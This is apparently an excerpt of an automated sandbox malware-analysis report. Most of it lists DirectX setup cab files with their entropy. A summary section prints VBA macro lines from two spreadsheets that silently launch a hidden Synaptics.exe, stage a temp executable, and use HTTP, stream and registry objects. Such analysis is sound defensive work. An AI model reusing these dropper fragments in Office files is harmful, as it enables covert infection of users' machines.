                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Aug2007_d3dx9_35_x86[1].cab entropy: 7.9991869164Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Mar2008_d3dx9_37_x86[1].cab entropy: 7.99972380205Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Nov2007_d3dx10_36_x86.cab entropy: 7.99885807363Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CE7D2.tmp\Nov2007_d3dx10_36_x86.cab entropy: 7.99885807363Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Nov2007_d3dx10_36_x86[1].cab entropy: 7.99885807363Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Nov2007_d3dx9_36_x86.cab entropy: 7.99907865291Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CDD52.tmp\Nov2007_d3dx9_36_x86.cab entropy: 7.99907865291Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Nov2007_d3dx9_36_x86[1].cab entropy: 7.99907865291Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2007_d3dx10_35_x86.cab entropy: 7.9986813742Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CD563.tmp\Aug2007_d3dx10_35_x86.cab entropy: 7.9986813742Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Aug2007_d3dx10_35_x86[1].cab entropy: 7.9986813742Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2007_d3dx9_35_x86.cab entropy: 7.9991869164Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Mar2008_d3dx10_37_x86.cab entropy: 7.99894945695Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CFCA2.tmp\Mar2008_d3dx10_37_x86.cab entropy: 7.99894945695Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Mar2008_d3dx10_37_x86[1].cab entropy: 7.99894945695Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Mar2008_d3dx9_37_x86.cab entropy: 7.99972380205Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CEF92.tmp\Mar2008_d3dx9_37_x86.cab entropy: 7.99972380205Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2008_d3dx10_38_x86.cab entropy: 7.99898013077Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D0EA3.tmp\Jun2008_d3dx10_38_x86.cab entropy: 7.99898013077Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Jun2008_d3dx10_38_x86[1].cab entropy: 7.99898013077Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2008_d3dx9_38_x86.cab entropy: 7.99972642235Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D04A1.tmp\Jun2008_d3dx9_38_x86.cab entropy: 7.99972642235Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Jun2008_d3dx9_38_x86[1].cab entropy: 7.99972642235Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D2A0B.tmp\Nov2008_d3dx9_40_x86.cab entropy: 7.99964527898Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Nov2008_d3dx9_40_x86[1].cab entropy: 7.99964527898Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2008_d3dx10_39_x86.cab entropy: 7.99888618458Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D21AE.tmp\Aug2008_d3dx10_39_x86.cab entropy: 7.99888618458Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Aug2008_d3dx10_39_x86[1].cab entropy: 7.99888618458Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2008_d3dx9_39_x86.cab entropy: 7.9996829971Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D176D.tmp\Aug2008_d3dx9_39_x86.cab entropy: 7.9996829971Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Aug2008_d3dx9_39_x86[1].cab entropy: 7.9996829971Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Jun2007_d3dx10_34_x86[1].cab entropy: 7.9989902264Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CC1DB.tmp\Jun2007_d3dx10_34_x86.cab entropy: 7.9989902264Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Mar2009_d3dx10_41_x86.cab entropy: 7.99875716031Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D498A.tmp\Mar2009_d3dx10_41_x86.cab entropy: 7.99875716031Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Mar2009_d3dx10_41_x86[1].cab entropy: 7.99875716031Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Mar2009_d3dx9_41_x86.cab entropy: 7.99977242309Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D3EDB.tmp\Mar2009_d3dx9_41_x86.cab entropy: 7.99977242309Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Mar2009_d3dx9_41_x86[1].cab entropy: 7.99977242309Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Nov2008_d3dx10_40_x86.cab entropy: 7.99901184706Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx10_34_x86.cab entropy: 7.9989902264Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D3527.tmp\Nov2008_d3dx10_40_x86.cab entropy: 7.99901184706Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Nov2008_d3dx10_40_x86[1].cab entropy: 7.99901184706Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Nov2008_d3dx9_40_x86.cab entropy: 7.99964527898Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx11_42_x86.cab entropy: 7.99133262696Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D5FE0.tmp\Aug2009_d3dx11_42_x86.cab entropy: 7.99133262696Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Aug2009_d3dx11_42_x86[1].cab entropy: 7.99133262696Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx10_42_x86.cab entropy: 7.99617858979Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D59F5.tmp\Aug2009_d3dx10_42_x86.cab entropy: 7.99617858979Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Aug2009_d3dx10_42_x86[1].cab entropy: 7.99617858979Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx9_42_x86.cab entropy: 7.99947517428Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D5244.tmp\Aug2009_d3dx9_42_x86.cab entropy: 7.99947517428Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Aug2009_d3dx9_42_x86[1].cab entropy: 7.99947517428Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Jun2007_d3dx9_34_x86[1].cab entropy: 7.99906642826Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CB74C.tmp\Jun2007_d3dx9_34_x86.cab entropy: 7.99906642826Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx9_34_x86.cab entropy: 7.99906642826Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Apr2007_d3dx10_33_x86[1].cab entropy: 7.99896802841Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CB038.tmp\Apr2007_d3dx10_33_x86.cab entropy: 7.99896802841Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx10_33_x86.cab entropy: 7.99896802841Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C516E.tmp\Feb2005_d3dx9_24_x86.cab entropy: 7.99897272471Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Feb2005_d3dx9_24_x86.cab entropy: 7.99897272471Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Apr2005_d3dx9_25_x86[1].cab entropy: 7.99907513517Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C59BB.tmp\Apr2005_d3dx9_25_x86.cab entropy: 7.99907513517Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2005_d3dx9_25_x86.cab entropy: 7.99907513517Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Jun2005_d3dx9_26_x86[1].cab entropy: 7.99904021782Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C639E.tmp\Jun2005_d3dx9_26_x86.cab entropy: 7.99904021782Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2005_d3dx9_26_x86.cab entropy: 7.99904021782Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Aug2005_d3dx9_27_x86[1].cab entropy: 7.99913898215Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C6D43.tmp\Aug2005_d3dx9_27_x86.cab entropy: 7.99913898215Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2005_d3dx9_27_x86.cab entropy: 7.99913898215Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Dec2005_d3dx9_28_x86[1].cab entropy: 7.99912186515Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C75FD.tmp\Dec2005_d3dx9_28_x86.cab entropy: 7.99912186515Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2005_d3dx9_28_x86.cab entropy: 7.99912186515Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Feb2006_d3dx9_29_x86[1].cab entropy: 7.99922866964Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\dxupdate[1].cab entropy: 7.99005571784Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6BB1F2.tmp\dxupdate.cab entropy: 7.99005571784Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dxupdate.cab entropy: 7.99005571784Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C7F92.tmp\Feb2006_d3dx9_29_x86.cab entropy: 7.99922866964Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Feb2006_d3dx9_29_x86.cab entropy: 7.99922866964Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Apr2006_d3dx9_30_x86[1].cab entropy: 7.99905051808Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C883D.tmp\Apr2006_d3dx9_30_x86.cab entropy: 7.99905051808Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2006_d3dx9_30_x86.cab entropy: 7.99905051808Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\OCT2006_d3dx9_31_x86[1].cab entropy: 7.99908172452Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C92CC.tmp\Oct2006_d3dx9_31_x86.cab entropy: 7.99908172452Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Oct2006_d3dx9_31_x86.cab entropy: 7.99908172452Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\DEC2006_d3dx9_32_x86[1].cab entropy: 7.99909224767Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C9C42.tmp\Dec2006_d3dx9_32_x86.cab entropy: 7.99909224767Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx9_32_x86.cab entropy: 7.99909224767Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Apr2007_d3dx9_33_x86[1].cab entropy: 7.99928426182Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CA606.tmp\Apr2007_d3dx9_33_x86.cab entropy: 7.99928426182Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx9_33_x86.cab entropy: 7.99928426182Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Dec2006_d3dx10_00_x86[1].cab entropy: 7.99660427625Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C3A9A.tmp\Dec2006_d3dx10_00_x86.cab entropy: 7.99660427625Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx10_00_x86.cab entropy: 7.99660427625Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Dec2006_d3dx10_00_x64[1].cab entropy: 7.99694629492Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C4047.tmp\Dec2006_d3dx10_00_x64.cab entropy: 7.99694629492Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx10_00_x64.cab entropy: 7.99694629492Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Feb2005_d3dx9_24_x86[1].cab entropy: 7.99897272471Jump to dropped file

                          System Summary

                          barindex
                          Document contains an embedded VBA macro with suspicious strings
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Document contains an embedded VBA with functions possibly related to ADO stream file operations
                          Source: zsbKktb3.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Source: GLTYDMDUST.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Document contains an embedded VBA with functions possibly related to HTTP operations
                          Source: zsbKktb3.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Source: GLTYDMDUST.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                          Source: zsbKktb3.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: GLTYDMDUST.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100263F ExitWindowsEx,2_2_0100263F
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010018B5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,2_2_010018B5
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\Logs\DirectX.logJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directxJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetupJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET8E7C.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET8E7C.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET8EBB.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET8EBB.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\filelist.datJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6BB1F2.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6BB1F2.tmp\dxupdate.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\dxupdate.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C255D.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C255D.tmp\Apr2006_xinput_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_xinput_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C2A7D.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C2A7D.tmp\Apr2006_xinput_x64.cabJump to behavior
